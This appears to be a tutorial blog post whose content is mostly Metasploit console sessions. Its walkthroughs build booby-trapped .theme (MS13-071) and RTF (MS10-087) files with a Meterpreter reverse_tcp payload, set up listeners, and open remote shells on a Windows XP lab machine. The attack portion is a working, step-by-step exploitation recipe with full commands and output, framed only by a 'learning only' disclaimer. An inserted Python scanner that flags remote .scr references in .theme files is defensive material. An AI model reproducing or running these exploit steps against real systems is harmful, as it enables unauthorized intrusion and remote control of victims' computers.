!!! These notes are for learning and discussion only; do not use them for any other purpose !!!
Metasploit ships with many file-format exploit-generation modules. Here I only note the simplest way to use them:
root@kali:~# msfconsole
......
......
msf > search fileformat    # search for the available modules

Matching Modules
================

   Name    Disclosure Date    Rank    Description
   ----    ---------------    ----    -----------
......
......
First way: connect directly, without going through a handler
msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > show payloads

Compatible Payloads
===================

   Name    Disclosure Date    Rank    Description
   ----    ---------------    ----    -----------
.......
.......

msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > show options

Module options (exploit/windows/fileformat/ms13_071_theme):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILENAME    msf.theme        yes       The theme file
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   UNCPATH                      no        Override the UNC path to use (Ex: \\192.168.1.1\share\exploit.scr)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 / Windows 2003 SP2

msf exploit(ms13_071_theme) > set LHOST 192.168.19.128
LHOST => 192.168.19.128
msf exploit(ms13_071_theme) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.19.128:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.19.128\mEjIom\pDuQX.scr
[*] Server started.

# Now open msf.theme on the Windows machine and click the "Screen Saver" tab; this triggers the vulnerability, as shown below
[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1155) at 2014-06-04 21:45:19 +0800

msf exploit(ms13_071_theme) > sessions

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:4444 -> 192.168.19.129:1155 (192.168.19.129)

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter >
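As an added defensive check (not part of the original notes or of Metasploit): the module above works by shipping a .theme file whose screen-saver entry points at a UNC share serving a .scr (the `\\192.168.19.128\mEjIom\pDuQX.scr` line in the output), so a simple triage step is to scan .theme files for any value that is a UNC path, and treat a remote .scr as the highest-priority hit. The sample theme text is constructed; the `[boot]` / `SCRNSAVE.EXE` key is the standard .theme screen-saver setting, and the exact layout of the module's generated file is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample .theme contents (not a real generated file): one benign
# local wallpaper entry and one screen saver pointing at a UNC share.
SAMPLE_THEME = r"""
[Theme]
DisplayName=Corporate Blue

[boot]
SCRNSAVE.EXE=\\192.168.19.128\mEjIom\pDuQX.scr

[Control Panel\Desktop]
Wallpaper=C:\WINDOWS\Web\Wallpaper\Bliss.bmp
"""

# Any UNC path: \\host\share...
UNC_ANY = re.compile(r"^\\\\[^\\]+\\")
# A UNC path whose final component is a screen-saver executable.
UNC_SCR = re.compile(r"^\\\\[^\\]+\\[^\\]+\\.*\.scr$", re.IGNORECASE)


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal case-preserving INI parser; .theme files are plain INI text."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections


def find_remote_references(text: str) -> List[Tuple[str, str, str, bool]]:
    """Return (section, key, value, is_scr) for every UNC-valued entry,
    with remote .scr references sorted first."""
    hits = []
    for section, entries in parse_ini(text).items():
        for key, value in entries.items():
            if UNC_ANY.match(value):
                hits.append((section, key, value, bool(UNC_SCR.match(value))))
    return sorted(hits, key=lambda h: not h[3])
```

Run over a directory of user-supplied .theme files, an empty result means no remote references; any `is_scr=True` hit is the pattern this module produces and is worth quarantining before the file reaches the Screen Saver tab.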
Second way: connect through a handler
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > show payloads

Compatible Payloads
===================

   Name    Disclosure Date    Rank    Description
   ----    ---------------    ----    -----------
......
......

msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.19.128    # set LHOST to the local IP
LHOST => 192.168.19.128
msf exploit(ms10_087_rtf_pfragments_bof) > set LPORT 8888    # set LPORT by hand
LPORT => 8888
msf exploit(ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > back
msf > use exploit/multi/handler    # switch to the handler module
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.19.128    # set the local listening IP
LHOST => 192.168.19.128
msf exploit(handler) > set LPORT 8888    # set the local listening port
LPORT => 8888
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.19.128:8888
[*] Starting the payload handler...

# Open msf.rtf on the Windows machine; this triggers the vulnerability, as shown below
[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 2 opened (192.168.19.128:8888 -> 192.168.19.129:1163) at 2014-06-04 21:53:35 +0800

meterpreter > sysinfo
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter >